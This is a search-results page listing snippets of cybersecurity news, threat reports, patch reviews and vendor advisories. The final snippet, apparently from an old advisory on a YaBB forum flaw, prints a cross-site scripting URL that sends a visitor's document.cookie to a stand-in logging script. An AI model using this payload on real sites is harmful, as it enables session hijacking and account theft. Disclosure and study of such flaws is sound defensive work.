12 matches found
The Q1 vulnerability pulse
Welcome to this week's edition of the Threat Source newsletter. The first quarter of 2026 passed faster than a misconfigured firewall rule gets exploited -- and the last few weeks have been firmly stamped with the "software supply chain compromise" label, with headlines surrounding incidents...
Talos Takes: 2025 insights from Talos and Splunk
In this episode of Talos Takes, Amy is joined by William Largent Cisco Talos and Lou Stella Splunk for a "double-header" discussion. With the recent release of the Cisco Talos 2025 Year in Review and the Splunk Top 50 Cybersecurity Threats report, we're breaking down the most critical trends that...
2025 Talos Year in Review: Speed, scale, and staying power
The 2025 Talos Year in Review is now available to view online. The pace and scale of adversary activity in 2025 placed sustained pressure on security teams across industries. As with each annual report, our goal at Talos is to provide the security community with a clear analysis of the tactics,...
Patch it up: Old vulnerabilities are everyone’s problems
Welcome to this week's edition of the Threat Source newsletter. Let's pick up where we left off in my last newsletter. Please mark your calendars: The free support for Windows 10 will end on October 14, 2025. When a software loses vendor support, it no longer receives patches or updates. As...
Microsoft Patch Tuesday April 2020: my classification script, confusing RCE in Adobe Type Manager and updates for older vulnerabilities
Easiest task ever? Making the reviews of Microsoft Patch Tuesday vulnerabilities should be an easy task. All vulnerability data is publicly available. Even better, dozens of reviews have already been written. Just read them, combine and post. Right? Not really. In fact it is quite boring and...
Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters
Christopher Evans of Cisco Talos conducted the research for this post. Executive Summary Cisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attacke...
DDoS attacks in Q2 2018
News overview Q2 2018 news includes: non-standard use of old vulnerabilities, new botnets, the cutthroat world of cryptocurrencies, a high-profile DDoS attack or not with a political subtext, the slashdot effect, some half-baked attempts at activism, and a handful arrests. But first things first...
ThreatList: Exploit Kits Still a Top Web-based Threat
What we can glean from a 2018 roundup of current web-threats is old vulnerabilities die hard. In a report, released by Palo Alto Networks Unit 42, researchers said so far this year cybercriminals are targeting unpatched PCs with ancient CVEs and well-known exploit kits. Here is a ThreatList from...
12 Threats of Christmas
We've all heard the old classic, "The 12 Days of Christmas." While we all enjoy a good song about a partridge in a pear tree, Trend Micro has updated this seasonal standby, counting down the top threats to be aware of heading into 2018, from least to most pressing. Let's look at the vulnerabiliti...
Overlooked Old Vulnerabilities Lead to Major Data Breaches, Says TrustWave
A recent report suggests that focusing too much on new security threats might make companies overlook older, more commonly exploited vulnerabilities. The report by TrustWave is based on data from over 1,900 penetration tests and more than 200 data breach investigations for clients like American...
[ MDKSA-2006:212 ] - Updated doxygen packages to fix embedded libpng vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDKSA-2006:212 http://www.mandriva.com/security/ Package : doxygen Date : November 16, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0 Problem Description: Doxygen is a documentation system for C, C++ and...
Cross-site Scripting Vulnerability in YaBB 1 Gold - SP1!
http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269Scriptlocation3d'Http://www.scriptkiddie.home/x.php?Cookie3d'2bdocument.cookie3b/Script num is a post that doesn't exist board must be a valid and accessable board X.php script to log the cookie that in an example of the...